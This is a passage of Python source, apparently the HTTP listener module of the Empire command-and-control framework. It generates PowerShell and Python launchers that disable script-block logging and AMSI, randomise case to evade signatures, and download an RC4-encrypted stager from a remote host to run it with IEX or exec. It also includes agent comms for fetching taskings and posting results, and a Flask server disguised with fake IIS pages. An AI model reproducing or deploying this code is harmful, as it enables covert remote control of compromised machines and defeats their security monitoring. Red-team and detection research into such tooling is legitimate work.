'#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;',
'background-color:#555555;}',
'#content{margin:0 0 0 2%;position:relative;}',
'.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}',
'-->',
'</style>',
'</head>',
'<body>',
'<div id="header"><h1>Server Error</h1></div>',
'<div id="content">',
' <div class="content-container"><fieldset>',
' <h2>404 - File or directory not found.</h2>',
' <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>',
' </fieldset></div>',
'</div>',
'</body>',
'</html>',
' ' * self.header_offset, # randomize the length of the header to evade signature based detection
])
def index_page(self):
"""
Returns a default HTTP server page.
"""
return '\n'.join([
'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">',
'<html xmlns="http://www.w3.org/1999/xhtml">',
'<head>',
'<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />',
'<title>IIS7</title>',
'<style type="text/css">',
'<!--',
'body {',
' color:#000000;',
' background-color:#B3B3B3;',
' margin:0;',
'}',
'',
'#container {',
' margin-left:auto;',
' margin-right:auto;',
' text-align:center;',
' }',
'',
'a img {',
' border:none;',
'}',
'',
'-->',
'</style>',
'</head>',
'<body>',
'<div id="container">',
'<a href="http://go.microsoft.com/fwlink/?linkid=66138&clcid=0x409"><img src="welcome.png" alt="IIS7" width="571" height="411" /></a>',
'</div>',
'</body>',
'</html>',
])
def validate_options(self):
"""
Validate all options for this listener.
"""
self.uris = [a.strip('/') for a in self.options['DefaultProfile']['Value'].split('|')[0].split(',')]
for key in self.options:
if self.options[key]['Required'] and (str(self.options[key]['Value']).strip() == ''):
print helpers.color("[!] Option \"%s\" is required." % (key))
return False
return True
def generate_launcher(self, encode=True, obfuscate=False, obfuscationCommand="", userAgent='default', proxy='default', proxyCreds='default', stagerRetries='0', language=None, safeChecks='', listenerName=None):
"""
Generate a basic launcher for the specified listener.
"""
if not language:
print helpers.color('[!] listeners/http generate_launcher(): no language specified!')
if listenerName and (listenerName in self.threads) and (listenerName in self.mainMenu.listeners.activeListeners):
# extract the set options for this instantiated listener
listenerOptions = self.mainMenu.listeners.activeListeners[listenerName]['options']
host = listenerOptions['Host']['Value']
launcher = listenerOptions['Launcher']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
profile = listenerOptions['DefaultProfile']['Value']
uris = [a for a in profile.split('|')[0].split(',')]
stage0 = random.choice(uris)
customHeaders = profile.split('|')[2:]
if language.startswith('po'):
# PowerShell
stager = '$ErrorActionPreference = \"SilentlyContinue\";'
if safeChecks.lower() == 'true':
stager = helpers.randomize_capitalization("If($PSVersionTable.PSVersion.Major -ge 3){")
# ScriptBlock Logging bypass
stager += helpers.randomize_capitalization("$GPF=[ref].Assembly.GetType(")
stager += "'System.Management.Automation.Utils'"
stager += helpers.randomize_capitalization(").\"GetFie`ld\"(")
stager += "'cachedGroupPolicySettings','N'+'onPublic,Static'"
stager += helpers.randomize_capitalization(");If($GPF){$GPC=$GPF.GetValue($null);If($GPC")
stager += "['ScriptB'+'lockLogging']"
stager += helpers.randomize_capitalization("){$GPC")
stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;"
stager += helpers.randomize_capitalization("$GPC")
stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}"
stager += helpers.randomize_capitalization("$val=[Collections.Generic.Dictionary[string,System.Object]]::new();$val.Add")
stager += "('EnableScriptB'+'lockLogging',0);"
stager += helpers.randomize_capitalization("$val.Add")
stager += "('EnableScriptBlockInvocationLogging',0);"
stager += helpers.randomize_capitalization("$GPC")
stager += "['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging']"
stager += helpers.randomize_capitalization("=$val}")
stager += helpers.randomize_capitalization("Else{[ScriptBlock].\"GetFie`ld\"(")
stager += "'signatures','N'+'onPublic,Static'"
stager += helpers.randomize_capitalization(").SetValue($null,(New-Object Collections.Generic.HashSet[string]))}")
# @mattifestation's AMSI bypass
stager += helpers.randomize_capitalization("[Ref].Assembly.GetType(")
stager += "'System.Management.Automation.AmsiUtils'"
stager += helpers.randomize_capitalization(')|?{$_}|%{$_.GetField(')
stager += "'amsiInitFailed','NonPublic,Static'"
stager += helpers.randomize_capitalization(").SetValue($null,$true)};")
stager += "};"
stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
stager += helpers.randomize_capitalization("$wc=New-Object System.Net.WebClient;")
if userAgent.lower() == 'default':
profile = listenerOptions['DefaultProfile']['Value']
userAgent = profile.split('|')[1]
stager += "$u='"+userAgent+"';"
if 'https' in host:
# allow for self-signed certificates for https connections
stager += "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};"
if userAgent.lower() != 'none' or proxy.lower() != 'none':
if userAgent.lower() != 'none':
stager += helpers.randomize_capitalization('$wc.Headers.Add(')
stager += "'User-Agent',$u);"
if proxy.lower() != 'none':
if proxy.lower() == 'default':
stager += helpers.randomize_capitalization("$wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy;")
else:
# TODO: implement form for other proxy
stager += helpers.randomize_capitalization("$proxy=New-Object Net.WebProxy('")
stager += proxy.lower()
stager += helpers.randomize_capitalization("');")
stager += helpers.randomize_capitalization("$wc.Proxy = $proxy;")
if proxyCreds.lower() != 'none':
if proxyCreds.lower() == "default":
stager += helpers.randomize_capitalization("$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;")
else:
# TODO: implement form for other proxy credentials
username = proxyCreds.split(':')[0]
password = proxyCreds.split(':')[1]
if len(username.split('\\')) > 1:
usr = username.split('\\')[1]
domain = username.split('\\')[0]
stager += "$netcred = New-Object System.Net.NetworkCredential('"+usr+"','"+password+"','"+domain+"');"
else:
usr = username.split('\\')[0]
stager += "$netcred = New-Object System.Net.NetworkCredential('"+usr+"','"+password+"');"
stager += helpers.randomize_capitalization("$wc.Proxy.Credentials = $netcred;")
#save the proxy settings to use during the entire staging process and the agent
stager += "$Script:Proxy = $wc.Proxy;"
# TODO: reimplement stager retries?
#check if we're using IPv6
listenerOptions = copy.deepcopy(listenerOptions)
bindIP = listenerOptions['BindIP']['Value']
port = listenerOptions['Port']['Value']
if ':' in bindIP:
if "http" in host:
if "https" in host:
host = 'https://' + '[' + str(bindIP) + ']' + ":" + str(port)
else:
host = 'http://' + '[' + str(bindIP) + ']' + ":" + str(port)
# code to turn the key string into a byte array
stager += helpers.randomize_capitalization("$K=[System.Text.Encoding]::ASCII.GetBytes(")
stager += "'%s');" % (stagingKey)
# this is the minimized RC4 stager code from rc4.ps1
stager += helpers.randomize_capitalization('$R={$D,$K=$Args;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.Count])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxor$S[($S[$I]+$S[$H])%256]}};')
# prebuild the request routing packet for the launcher
routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='POWERSHELL', meta='STAGE0', additional='None', encData='')
b64RoutingPacket = base64.b64encode(routingPacket)
stager += "$ser='%s';$t='%s';" % (host, stage0)
#Add custom headers if any
if customHeaders != []:
for header in customHeaders:
headerKey = header.split(':')[0]
headerValue = header.split(':')[1]
#If a Host header is defined, assume domain fronting is in use and add a call to the base URL first
#this is a trick to keep the true host name from showing in the TLS SNI portion of the client hello
if headerKey.lower() == "host":
stager += helpers.randomize_capitalization("try{$ig=$WC.DownloadData($ser)}catch{};")
stager += helpers.randomize_capitalization("$wc.Headers.Add(")
stager += "\"%s\",\"%s\");" % (headerKey, headerValue)
# add the RC4 packet to a cookie
stager += helpers.randomize_capitalization("$wc.Headers.Add(")
stager += "\"Cookie\",\"session=%s\");" % (b64RoutingPacket)
stager += helpers.randomize_capitalization("$data=$WC.DownloadData($ser+$t);")
stager += helpers.randomize_capitalization("$iv=$data[0..3];$data=$data[4..$data.length];")
# decode everything and kick it over to IEX to kick off execution
stager += helpers.randomize_capitalization("-join[Char[]](& $R $data ($IV+$K))|IEX")
if obfuscate:
stager = helpers.obfuscate(self.mainMenu.installPath, stager, obfuscationCommand=obfuscationCommand)
# base64 encode the stager and return it
if encode and ((not obfuscate) or ("launcher" not in obfuscationCommand.lower())):
return helpers.powershell_launcher(stager, launcher)
else:
# otherwise return the case-randomized stager
return stager
if language.startswith('py'):
# Python
launcherBase = 'import sys;'
if "https" in host:
# monkey patch ssl woohooo
launcherBase += "import ssl;\nif hasattr(ssl, '_create_unverified_context'):ssl._create_default_https_context = ssl._create_unverified_context;\n"
try:
if safeChecks.lower() == 'true':
launcherBase += "import re, subprocess;"
launcherBase += "cmd = \"ps -ef | grep Little\ Snitch | grep -v grep\"\n"
launcherBase += "ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)\n"
launcherBase += "out = ps.stdout.read()\n"
launcherBase += "ps.stdout.close()\n"
launcherBase += "if re.search(\"Little Snitch\", out):\n"
launcherBase += " sys.exit()\n"
except Exception as e:
p = "[!] Error setting LittleSnitch in stager: " + str(e)
print helpers.color(p, color='red')
if userAgent.lower() == 'default':
profile = listenerOptions['DefaultProfile']['Value']
userAgent = profile.split('|')[1]
launcherBase += "import urllib2;\n"
launcherBase += "UA='%s';" % (userAgent)
launcherBase += "server='%s';t='%s';" % (host, stage0)
# prebuild the request routing packet for the launcher
routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='PYTHON', meta='STAGE0', additional='None', encData='')
b64RoutingPacket = base64.b64encode(routingPacket)
launcherBase += "req=urllib2.Request(server+t);\n"
# add the RC4 packet to a cookie
launcherBase += "req.add_header('User-Agent',UA);\n"
launcherBase += "req.add_header('Cookie',\"session=%s\");\n" % (b64RoutingPacket)
# Add custom headers if any
if customHeaders != []:
for header in customHeaders:
headerKey = header.split(':')[0]
headerValue = header.split(':')[1]
#launcherBase += ",\"%s\":\"%s\"" % (headerKey, headerValue)
launcherBase += "req.add_header(\"%s\",\"%s\");\n" % (headerKey, headerValue)
if proxy.lower() != "none":
if proxy.lower() == "default":
launcherBase += "proxy = urllib2.ProxyHandler();\n"
else:
proto = proxy.split(':')[0]
launcherBase += "proxy = urllib2.ProxyHandler({'"+proto+"':'"+proxy+"'});\n"
if proxyCreds != "none":
if proxyCreds == "default":
launcherBase += "o = urllib2.build_opener(proxy);\n"
else:
launcherBase += "proxy_auth_handler = urllib2.ProxyBasicAuthHandler();\n"
username = proxyCreds.split(':')[0]
password = proxyCreds.split(':')[1]
launcherBase += "proxy_auth_handler.add_password(None,'"+proxy+"','"+username+"','"+password+"');\n"
launcherBase += "o = urllib2.build_opener(proxy, proxy_auth_handler);\n"
else:
launcherBase += "o = urllib2.build_opener(proxy);\n"
else:
launcherBase += "o = urllib2.build_opener();\n"
#install proxy and creds globally, so they can be used with urlopen.
launcherBase += "urllib2.install_opener(o);\n"
# download the stager and extract the IV
launcherBase += "a=urllib2.urlopen(req).read();\n"
launcherBase += "IV=a[0:4];"
launcherBase += "data=a[4:];"
launcherBase += "key=IV+'%s';" % (stagingKey)
# RC4 decryption
launcherBase += "S,j,out=range(256),0,[]\n"
launcherBase += "for i in range(256):\n"
launcherBase += " j=(j+S[i]+ord(key[i%len(key)]))%256\n"
launcherBase += " S[i],S[j]=S[j],S[i]\n"
launcherBase += "i=j=0\n"
launcherBase += "for char in data:\n"
launcherBase += " i=(i+1)%256\n"
launcherBase += " j=(j+S[i])%256\n"
launcherBase += " S[i],S[j]=S[j],S[i]\n"
launcherBase += " out.append(chr(ord(char)^S[(S[i]+S[j])%256]))\n"
launcherBase += "exec(''.join(out))"
if encode:
launchEncoded = base64.b64encode(launcherBase)
launcher = "echo \"import sys,base64,warnings;warnings.filterwarnings(\'ignore\');exec(base64.b64decode('%s'));\" | /usr/bin/python &" % (launchEncoded)
return launcher
else:
return launcherBase
else:
print helpers.color("[!] listeners/http generate_launcher(): invalid language specification: only 'powershell' and 'python' are currently supported for this module.")
else:
print helpers.color("[!] listeners/http generate_launcher(): invalid listener name specification!")
def generate_stager(self, listenerOptions, encode=False, encrypt=True, obfuscate=False, obfuscationCommand="", language=None):
"""
Generate the stager code needed for communications with this listener.
"""
if not language:
print helpers.color('[!] listeners/http generate_stager(): no language specified!')
return None
profile = listenerOptions['DefaultProfile']['Value']
uris = [a.strip('/') for a in profile.split('|')[0].split(',')]
launcher = listenerOptions['Launcher']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
workingHours = listenerOptions['WorkingHours']['Value']
killDate = listenerOptions['KillDate']['Value']
host = listenerOptions['Host']['Value']
customHeaders = profile.split('|')[2:]
# select some random URIs for staging from the main profile
stage1 = random.choice(uris)
stage2 = random.choice(uris)
if language.lower() == 'powershell':
# read in the stager base
f = open("%s/data/agent/stagers/http.ps1" % (self.mainMenu.installPath))
stager = f.read()
f.close()
# make sure the server ends with "/"
if not host.endswith("/"):
host += "/"
#Patch in custom Headers
if customHeaders != []:
headers = ','.join(customHeaders)
stager = stager.replace("$customHeaders = \"\";","$customHeaders = \""+headers+"\";")
#patch in working hours, if any
if workingHours != "":
stager = stager.replace('WORKING_HOURS_REPLACE', workingHours)
#Patch in the killdate, if any
if killDate != "":
stager = stager.replace('REPLACE_KILLDATE', killDate)
# patch the server and key information
stager = stager.replace('REPLACE_SERVER', host)
stager = stager.replace('REPLACE_STAGING_KEY', stagingKey)
stager = stager.replace('index.jsp', stage1)
stager = stager.replace('index.php', stage2)
randomizedStager = ''
for line in stager.split("\n"):
line = line.strip()
# skip commented line
if not line.startswith("#"):
# randomize capitalization of lines without quoted strings
if "\"" not in line:
randomizedStager += helpers.randomize_capitalization(line)
else:
randomizedStager += line
if obfuscate:
randomizedStager = helpers.obfuscate(self.mainMenu.installPath, randomizedStager, obfuscationCommand=obfuscationCommand)
# base64 encode the stager and return it
if encode:
return helpers.enc_powershell(randomizedStager)
elif encrypt:
RC4IV = os.urandom(4)
return RC4IV + encryption.rc4(RC4IV+stagingKey, randomizedStager)
else:
# otherwise just return the case-randomized stager
return randomizedStager
elif language.lower() == 'python':
template_path = [
os.path.join(self.mainMenu.installPath, '/data/agent/stagers'),
os.path.join(self.mainMenu.installPath, './data/agent/stagers')]
eng = templating.TemplateEngine(template_path)
template = eng.get_template('http.py')
template_options = {
'working_hours': workingHours,
'kill_date': killDate,
'staging_key': stagingKey,
'profile': profile,
'stage_1': stage1,
'stage_2': stage2
}
stager = template.render(template_options)
stager = obfuscation.py_minify(stager)
# base64 encode the stager and return it
if encode:
return base64.b64encode(stager)
if encrypt:
# return an encrypted version of the stager ("normal" staging)
RC4IV = os.urandom(4)
return RC4IV + encryption.rc4(RC4IV+stagingKey, stager)
else:
# otherwise return the standard stager
return stager
else:
print helpers.color("[!] listeners/http generate_stager(): invalid language specification, only 'powershell' and 'python' are currently supported for this module.")
def generate_agent(self, listenerOptions, language=None, obfuscate=False, obfuscationCommand=""):
"""
Generate the full agent code needed for communications with this listener.
"""
if not language:
print helpers.color('[!] listeners/http generate_agent(): no language specified!')
return None
language = language.lower()
delay = listenerOptions['DefaultDelay']['Value']
jitter = listenerOptions['DefaultJitter']['Value']
profile = listenerOptions['DefaultProfile']['Value']
lostLimit = listenerOptions['DefaultLostLimit']['Value']
killDate = listenerOptions['KillDate']['Value']
workingHours = listenerOptions['WorkingHours']['Value']
b64DefaultResponse = base64.b64encode(self.default_response())
if language == 'powershell':
f = open(self.mainMenu.installPath + "./data/agent/agent.ps1")
code = f.read()
f.close()
# patch in the comms methods
commsCode = self.generate_comms(listenerOptions=listenerOptions, language=language)
code = code.replace('REPLACE_COMMS', commsCode)
# strip out comments and blank lines
code = helpers.strip_powershell_comments(code)
# patch in the delay, jitter, lost limit, and comms profile
code = code.replace('$AgentDelay = 60', "$AgentDelay = " + str(delay))
code = code.replace('$AgentJitter = 0', "$AgentJitter = " + str(jitter))
code = code.replace('$Profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"', "$Profile = \"" + str(profile) + "\"")
code = code.replace('$LostLimit = 60', "$LostLimit = " + str(lostLimit))
code = code.replace('$DefaultResponse = ""', '$DefaultResponse = "'+str(b64DefaultResponse)+'"')
# patch in the killDate and workingHours if they're specified
if killDate != "":
code = code.replace('$KillDate,', "$KillDate = '" + str(killDate) + "',")
if obfuscate:
code = helpers.obfuscate(self.mainMenu.installPath, code, obfuscationCommand=obfuscationCommand)
return code
elif language == 'python':
f = open(self.mainMenu.installPath + "./data/agent/agent.py")
code = f.read()
f.close()
# patch in the comms methods
commsCode = self.generate_comms(listenerOptions=listenerOptions, language=language)
code = code.replace('REPLACE_COMMS', commsCode)
# strip out comments and blank lines
code = helpers.strip_python_comments(code)
# patch in the delay, jitter, lost limit, and comms profile
code = code.replace('delay = 60', 'delay = %s' % (delay))
code = code.replace('jitter = 0.0', 'jitter = %s' % (jitter))
code = code.replace('profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"', 'profile = "%s"' % (profile))
code = code.replace('lostLimit = 60', 'lostLimit = %s' % (lostLimit))
code = code.replace('defaultResponse = base64.b64decode("")', 'defaultResponse = base64.b64decode("%s")' % (b64DefaultResponse))
# patch in the killDate and workingHours if they're specified
if killDate != "":
code = code.replace('killDate = ""', 'killDate = "%s"' % (killDate))
if workingHours != "":
code = code.replace('workingHours = ""', 'workingHours = "%s"' % (workingHours))
return code
else:
print helpers.color("[!] listeners/http generate_agent(): invalid language specification, only 'powershell' and 'python' are currently supported for this module.")
def generate_comms(self, listenerOptions, language=None):
"""
Generate just the agent communication code block needed for communications with this listener.
This is so agents can easily be dynamically updated for the new listener.
"""
if language:
if language.lower() == 'powershell':
updateServers = """
$Script:ControlServers = @("%s");
$Script:ServerIndex = 0;
""" % (listenerOptions['Host']['Value'])
if listenerOptions['Host']['Value'].startswith('https'):
updateServers += "\n[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};"
getTask = """
function script:Get-Task {
try {
if ($Script:ControlServers[$Script:ServerIndex].StartsWith("http")) {
# meta 'TASKING_REQUEST' : 4
$RoutingPacket = New-RoutingPacket -EncData $Null -Meta 4
$RoutingCookie = [Convert]::ToBase64String($RoutingPacket)
# build the web request object
$wc = New-Object System.Net.WebClient
# set the proxy settings for the WC to be the default system settings
$wc.Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
if($Script:Proxy) {
$wc.Proxy = $Script:Proxy;
}
$wc.Headers.Add("User-Agent",$script:UserAgent)
$script:Headers.GetEnumerator() | % {$wc.Headers.Add($_.Name, $_.Value)}
$wc.Headers.Add("Cookie", "session=$RoutingCookie")
# choose a random valid URI for checkin
$taskURI = $script:TaskURIs | Get-Random
$result = $wc.DownloadData($Script:ControlServers[$Script:ServerIndex] + $taskURI)
$result
}
}
catch [Net.WebException] {
$script:MissedCheckins += 1
if ($_.Exception.GetBaseException().Response.statuscode -eq 401) {
# restart key negotiation
Start-Negotiate -S "$ser" -SK $SK -UA $ua
}
}
}
"""
sendMessage = """
function script:Send-Message {
param($Packets)
if($Packets) {
# build and encrypt the response packet
$EncBytes = Encrypt-Bytes $Packets
# build the top level RC4 "routing packet"
# meta 'RESULT_POST' : 5
$RoutingPacket = New-RoutingPacket -EncData $EncBytes -Meta 5
if($Script:ControlServers[$Script:ServerIndex].StartsWith('http')) {
# build the web request object
$wc = New-Object System.Net.WebClient
# set the proxy settings for the WC to be the default system settings
$wc.Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
if($Script:Proxy) {
$wc.Proxy = $Script:Proxy;
}
$wc.Headers.Add('User-Agent', $Script:UserAgent)
$Script:Headers.GetEnumerator() | ForEach-Object {$wc.Headers.Add($_.Name, $_.Value)}
try {
# get a random posting URI
$taskURI = $Script:TaskURIs | Get-Random
$response = $wc.UploadData($Script:ControlServers[$Script:ServerIndex]+$taskURI, 'POST', $RoutingPacket);
}
catch [System.Net.WebException]{
# exception posting data...
if ($_.Exception.GetBaseException().Response.statuscode -eq 401) {
# restart key negotiation
Start-Negotiate -S "$ser" -SK $SK -UA $ua
}
}
}
}
}
"""
return updateServers + getTask + sendMessage
elif language.lower() == 'python':
updateServers = "server = '%s'\n" % (listenerOptions['Host']['Value'])
if listenerOptions['Host']['Value'].startswith('https'):
updateServers += "hasattr(ssl, '_create_unverified_context') and ssl._create_unverified_context() or None"
sendMessage = """
def send_message(packets=None):
# Requests a tasking or posts data to a randomized tasking URI.
# If packets == None, the agent GETs a tasking from the control server.
# If packets != None, the agent encrypts the passed packets and
# POSTs the data to the control server.
global missedCheckins
global server
global headers
global taskURIs
data = None
if packets:
data = ''.join(packets)
# aes_encrypt_then_hmac is in stager.py
encData = aes_encrypt_then_hmac(key, data)
data = build_routing_packet(stagingKey, sessionID, meta=5, encData=encData)
else:
# if we're GETing taskings, then build the routing packet to stuff into a cookie first.
# meta TASKING_REQUEST = 4
routingPacket = build_routing_packet(stagingKey, sessionID, meta=4)
b64routingPacket = base64.b64encode(routingPacket)
headers['Cookie'] = "session=%s" % (b64routingPacket)
taskURI = random.sample(taskURIs, 1)[0]
requestUri = server + taskURI
try:
data = (urllib2.urlopen(urllib2.Request(requestUri, data, headers))).read()
return ('200', data)
except urllib2.HTTPError as HTTPError:
# if the server is reached, but returns an error (like 404)
missedCheckins = missedCheckins + 1
# if signaled for restaging, exit.
if HTTPError.code == 401:
sys.exit(0)
return (HTTPError.code, '')
except urllib2.URLError as URLerror:
# if the server cannot be reached
missedCheckins = missedCheckins + 1
return (URLerror.reason, '')
return ('', '')
"""
return updateServers + sendMessage
else:
print helpers.color("[!] listeners/http generate_comms(): invalid language specification, only 'powershell' and 'python' are currently supported for this module.")
else:
print helpers.color('[!] listeners/http generate_comms(): no language specified!')
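# Illustrative note (added; not part of the original module): both comms stubs above
# carry the RC4 routing packet for a tasking request (meta=4) inside a
# "session=<base64>" cookie. Conceptually the agent side does roughly:
#
#     routingPacket = build_routing_packet(stagingKey, sessionID, meta=4)
#     headers['Cookie'] = "session=%s" % (base64.b64encode(routingPacket))
#
# (build_routing_packet is the helper referenced in the generated Python stub), and
# handle_get() below reverses it by splitting the Cookie header on 'session' and
# base64-decoding the value before passing it to handle_agent_data().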
def start_server(self, listenerOptions):
"""
Threaded function that actually starts up the Flask server.
"""
# make a copy of the currently set listener options for later stager/agent generation
listenerOptions = copy.deepcopy(listenerOptions)
# suppress the normal Flask output
log = logging.getLogger('werkzeug')
log.setLevel(logging.ERROR)
bindIP = listenerOptions['BindIP']['Value']
host = listenerOptions['Host']['Value']
port = listenerOptions['Port']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
stagerURI = listenerOptions['StagerURI']['Value']
userAgent = self.options['UserAgent']['Value']
listenerName = self.options['Name']['Value']
proxy = self.options['Proxy']['Value']
proxyCreds = self.options['ProxyCreds']['Value']
app = Flask(__name__)
self.app = app
@app.route('/download/<stager>')
def send_stager(stager):
if 'po' in stager:
launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='powershell', encode=False, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds)
return launcher
elif 'py' in stager:
launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='python', encode=False, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds)
return launcher
else:
return make_response(self.default_response(), 404)
@app.before_request
def check_ip():
"""
Before every request, check if the IP address is allowed.
"""
if not self.mainMenu.agents.is_ip_allowed(request.remote_addr):
dispatcher.send("[!] %s on the blacklist/not on the whitelist requested resource" % (request.remote_addr), sender="listeners/http")
return make_response(self.default_response(), 404)
@app.after_request
def change_header(response):
"Modify the default server version in the response."
response.headers['Server'] = listenerOptions['ServerVersion']['Value']
return response
@app.after_request
def add_proxy_headers(response):
"Add HTTP headers to avoid proxy caching."
response.headers['Cache-Control'] = "no-cache, no-store, must-revalidate"
response.headers['Pragma'] = "no-cache"
response.headers['Expires'] = "0"
return response
@app.route('/')
@app.route('/index.html')
def serve_index():
"""
Return default server web page if user navigates to index.
"""
static_dir = self.mainMenu.installPath + "data/misc/"
return make_response(self.index_page(), 200)
@app.route('/welcome.png')
def serve_index_helper():
"""
Serves image loaded by index page.
"""
static_dir = self.mainMenu.installPath + "data/misc/"
return send_from_directory(static_dir, 'welcome.png')
@app.route('/<path:request_uri>', methods=['GET'])
def handle_get(request_uri):
"""
Handle an agent GET request.
This is used during the first step of the staging process,
and when the agent requests taskings.
"""
clientIP = request.remote_addr
dispatcher.send("[*] GET request for %s/%s from %s" % (request.host, request_uri, clientIP), sender='listeners/http')
routingPacket = None
cookie = request.headers.get('Cookie')
if cookie and cookie != '':
try:
# see if we can extract the 'routing packet' from the specified cookie location
# NOTE: this can be easily moved to a parameter, another cookie value, etc.
if 'session' in cookie:
dispatcher.send("[*] GET cookie value from %s : %s" % (clientIP, cookie), sender='listeners/http')
cookieParts = cookie.split(';')
for part in cookieParts:
if part.startswith('session'):
base64RoutingPacket = part[part.find('=')+1:]
# decode the routing packet base64 value in the cookie
routingPacket = base64.b64decode(base64RoutingPacket)
except Exception as e:
routingPacket = None
pass
if routingPacket:
# parse the routing packet and process the results
dataResults = self.mainMenu.agents.handle_agent_data(stagingKey, routingPacket, listenerOptions, clientIP)
if dataResults and len(dataResults) > 0:
for (language, results) in dataResults:
if results:
if results == 'STAGE0':
# handle_agent_data() signals that the listener should return the stager.ps1 code
# step 2 of negotiation -> return stager.ps1 (stage 1)
dispatcher.send("[*] Sending %s stager (stage 1) to %s" % (language, clientIP), sender='listeners/http')
stage = self.generate_stager(language=language, listenerOptions=listenerOptions, obfuscate=self.mainMenu.obfuscate, obfuscationCommand=self.mainMenu.obfuscateCommand)
return make_response(stage, 200)
elif results.startswith('ERROR:'):
dispatcher.send("[!] Error from agents.handle_agent_data() for %s from %s: %s" % (request_uri, clientIP, results), sender='listeners/http')
if 'not in cache' in results:
# signal the client to restage
print helpers.color("[*] Orphaned agent from %s, signaling restaging" % (clientIP))
return make_response(self.default_response(), 401)
else:
return make_response(self.default_response(), 200)
else:
# actual taskings
dispatcher.send("[*] Agent from %s retrieved taskings" % (clientIP), sender='listeners/http')
return make_response(results, 200)
else:
# dispatcher.send("[!] Results are None...", sender='listeners/http')
return make_response(self.default_response(), 200)
else:
return make_response(self.default_response(), 200)
else:
dispatcher.send("[!] %s requested by %s with no routing packet." % (request_uri, clientIP), sender='listeners/http')
return make_response(self.default_response(), 200)
@app.route('/<path:request_uri>', methods=['POST'])
def handle_post(request_uri):
"""
Handle an agent POST request.
"""
stagingKey = listenerOptions['StagingKey']['Value']
clientIP = request.remote_addr
requestData = request.get_data()
dispatcher.send("[*] POST request data length from %s : %s" % (clientIP, len(requestData)), sender='listeners/http')
# the routing packet should be at the front of the binary request.data
# NOTE: this can also go into a cookie/etc.
dataResults = self.mainMenu.agents.handle_agent_data(stagingKey, requestData, listenerOptions, clientIP)
if dataResults and len(dataResults) > 0:
for (language, results) in dataResults:
if results:
if results.startswith('STAGE2'):
# TODO: document the exact results structure returned
if ':' in clientIP:
clientIP = '[' + str(clientIP) + ']'
sessionID = results.split(' ')[1].strip()
sessionKey = self.mainMenu.agents.agents[sessionID]['sessionKey']
dispatcher.send("[*] Sending agent (stage 2) to %s at %s" % (sessionID, clientIP), sender='listeners/http')
hopListenerName = request.headers.get('Hop-Name')
try:
hopListener = helpers.get_listener_options(hopListenerName)
tempListenerOptions = copy.deepcopy(listenerOptions)
tempListenerOptions['Host']['Value'] = hopListener['Host']['Value']
except TypeError:
tempListenerOptions = listenerOptions
# step 6 of negotiation -> server sends patched agent.ps1/agent.py
agentCode = self.generate_agent(language=language, listenerOptions=tempListenerOptions, obfuscate=self.mainMenu.obfuscate, obfuscationCommand=self.mainMenu.obfuscateCommand)
encryptedAgent = encryption.aes_encrypt_then_hmac(sessionKey, agentCode)
# TODO: wrap ^ in a routing packet?
return make_response(encryptedAgent, 200)
elif results[:10].lower().startswith('error') or results[:10].lower().startswith('exception'):
dispatcher.send("[!] Error returned for results by %s : %s" %(clientIP, results), sender='listeners/http')
return make_response(self.default_response(), 404)
elif results == 'VALID':
dispatcher.send("[*] Valid results return by %s" % (clientIP), sender='listeners/http')
return make_response(self.default_response(), 404)
else:
return make_response(results, 200)
else:
return make_response(self.default_response(), 404)
else:
return make_response(self.default_response(), 404)
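# Summary note (added for clarity; the step numbering comes from the inline comments
# above): the staging flow this listener implements is roughly:
#   GET  with routing packet, result 'STAGE0'      -> return the stager (stage 1)
#   POST with routing packet, result 'STAGE2 <id>' -> return the AES-encrypted, patched agent (stage 2)
#   later GETs / POSTs                             -> taskings and result posts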
try:
certPath = listenerOptions['CertPath']['Value']
host = listenerOptions['Host']['Value']
if certPath.strip() != '' and host.startswith('https'):
certPath = os.path.abspath(certPath)
# support any version of tls
pyversion = sys.version_info
if pyversion[0] == 2 and pyversion[1] == 7 and pyversion[2] >= 13:
proto = ssl.PROTOCOL_TLS
elif pyversion[0] >= 3:
proto = ssl.PROTOCOL_TLS
else:
proto = ssl.PROTOCOL_SSLv23
context = ssl.SSLContext(proto)
context.load_cert_chain("%s/empire-chain.pem" % (certPath), "%s/empire-priv.key" % (certPath))
app.run(host=bindIP, port=int(port), threaded=True, ssl_context=context)
else:
app.run(host=bindIP, port=int(port), threaded=True)
except Exception as e:
